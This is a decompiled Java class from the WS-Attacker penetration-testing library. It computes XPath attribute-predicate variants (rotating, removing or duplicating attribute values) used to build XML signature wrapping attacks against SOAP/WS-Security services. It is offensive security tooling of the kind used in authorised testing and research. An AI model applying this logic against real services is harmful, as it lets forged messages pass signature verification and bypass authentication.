/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.signatureWrapping.xpath.weakness;

import java.util.ArrayList;
import java.util.List;
import org.apache.log4j.Logger;
import org.w3c.dom.Attr;
import org.w3c.dom.Element;
import org.w3c.dom.NamedNodeMap;
import wsattacker.library.signatureWrapping.option.PayloadElement;
import wsattacker.library.signatureWrapping.option.SignedElement;
import wsattacker.library.signatureWrapping.util.exception.InvalidWeaknessException;
import wsattacker.library.signatureWrapping.util.id.RandomIdGenerator;
import wsattacker.library.signatureWrapping.xpath.interfaces.XPathWeaknessInterface;
import wsattacker.library.signatureWrapping.xpath.parts.Step;
import wsattacker.library.signatureWrapping.xpath.parts.predicate.OrExpression;
import wsattacker.library.signatureWrapping.xpath.parts.predicate.Predicate;
import wsattacker.library.signatureWrapping.xpath.parts.predicate.concrete.AttributeAndExpression;
import wsattacker.library.signatureWrapping.xpath.weakness.util.WeaknessLog;

public class XPathAttributeWeaknessPostProcess
implements XPathWeaknessInterface {
    private Step step;
    private static final Logger LOG = Logger.getLogger(XPathAttributeWeaknessPostProcess.class);
    private final List<AttributeAndExpression> attributeAndList = new ArrayList<AttributeAndExpression>();

    public XPathAttributeWeaknessPostProcess(Step step) throws InvalidWeaknessException {
        for (Predicate pred : step.getPredicates()) {
            for (OrExpression or : pred.getOrExpressions()) {
                if (or.getAndExpressions().size() != 1 || !(or.getAndExpressions().get(0) instanceof AttributeAndExpression)) continue;
                AttributeAndExpression and = (AttributeAndExpression)or.getAndExpressions().get(0);
                this.attributeAndList.add(and);
            }
        }
        if (this.attributeAndList.isEmpty()) {
            throw new InvalidWeaknessException("No Attribut-Expressions found.");
        }
    }

    @Override
    public int getNumberOfPossibilities() {
        return 3 * this.attributeAndList.size();
    }

    @Override
    public void abuseWeakness(int index, SignedElement signedElement, PayloadElement payloadElement) throws InvalidWeaknessException {
        AttributeAndExpression and = this.attributeAndList.get(index / 3);
        this.abuseWeakness(and, index % 3, signedElement.getSignedElement(), payloadElement.getPayloadElement());
    }

    private void abuseWeakness(AttributeAndExpression and, int index, Element signedElement, Element payloadElement) throws InvalidWeaknessException {
        int difference = 0;
        Element signedAttributeElement = signedElement;
        Attr signedAttribute = XPathAttributeWeaknessPostProcess.getAttributeByQualifiedName(signedAttributeElement, and.getPrefix(), and.getLocalname());
        while (signedAttributeElement.getNodeType() == 1 && (signedAttribute == null || signedAttribute != null && !signedAttribute.getValue().equals(and.getValue()))) {
            ++difference;
            signedAttributeElement = (Element)signedAttributeElement.getParentNode();
            signedAttribute = XPathAttributeWeaknessPostProcess.getAttributeByQualifiedName(signedAttributeElement, and.getPrefix(), and.getLocalname());
        }
        if (signedAttribute == null) {
            LOG.warn((Object)("Could not detect signed attribute Element for " + and));
            throw new InvalidWeaknessException();
        }
        Element payloadAttributeElement = payloadElement;
        for (int i = 0; i < difference; ++i) {
            payloadAttributeElement = (Element)payloadAttributeElement.getParentNode();
        }
        Attr payloadAttribute = XPathAttributeWeaknessPostProcess.getAttributeByQualifiedName(payloadAttributeElement, and.getPrefix(), and.getLocalname());
        if (payloadAttribute == null) {
            payloadAttribute = (Attr)XPathAttributeWeaknessPostProcess.getAttributeByQualifiedName(signedAttributeElement, and.getPrefix(), and.getLocalname()).cloneNode(true);
            payloadAttributeElement.setAttributeNode(payloadAttribute);
        }
        String attributelement = payloadAttributeElement.getNodeName();
        String attributename = payloadAttribute.getNodeName();
        switch (index) {
            case 0: {
                if (signedAttribute.getValue().equals(payloadAttribute.getValue())) {
                    payloadAttribute.setNodeValue(RandomIdGenerator.rotate_ID(payloadAttribute.getValue()));
                }
                WeaknessLog.append(String.format("Payload element %s gets a new attribute value %s='%s'", attributelement, attributename, payloadAttribute.getValue()));
                break;
            }
            case 1: {
                payloadAttributeElement.removeAttributeNode(payloadAttribute);
                WeaknessLog.append(String.format("Removed attribute from from payload element %s", attributelement));
                break;
            }
            case 2: {
                String value = and.getValue();
                payloadAttribute.setNodeValue(value);
                WeaknessLog.append(String.format("Both %s elements have the same attribute value %s='%s'", attributelement, attributename, value));
                break;
            }
            default: {
                String error = "Index out of range: '" + index + "'";
                LOG.warn((Object)error);
                throw new InvalidWeaknessException(error);
            }
        }
    }

    public static Attr getAttributeByQualifiedName(Element element, String prefix, String localname) {
        if (prefix == null || prefix.isEmpty()) {
            return element.getAttributeNode(localname);
        }
        NamedNodeMap attributes = element.getAttributes();
        for (int i = 0; i < attributes.getLength(); ++i) {
            Attr attribute = (Attr)attributes.item(i);
            if (!attribute.getLocalName().equals(localname) || attribute.getPrefix() == null || !attribute.getPrefix().equals(prefix)) continue;
            return attribute;
        }
        return null;
    }

    public Step getStep() {
        return this.step;
    }
}

